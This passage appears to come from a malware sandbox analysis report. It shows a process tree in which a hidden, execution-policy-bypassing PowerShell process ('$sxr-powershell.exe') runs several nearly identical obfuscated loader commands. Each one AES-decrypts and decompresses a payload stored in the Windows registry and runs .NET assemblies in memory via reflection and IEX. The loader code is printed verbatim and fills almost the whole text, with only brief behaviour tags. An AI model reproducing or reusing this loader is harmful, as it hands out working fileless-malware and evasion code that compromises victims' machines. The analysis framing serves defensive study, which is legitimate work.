'')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3008
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1852
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3568
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = 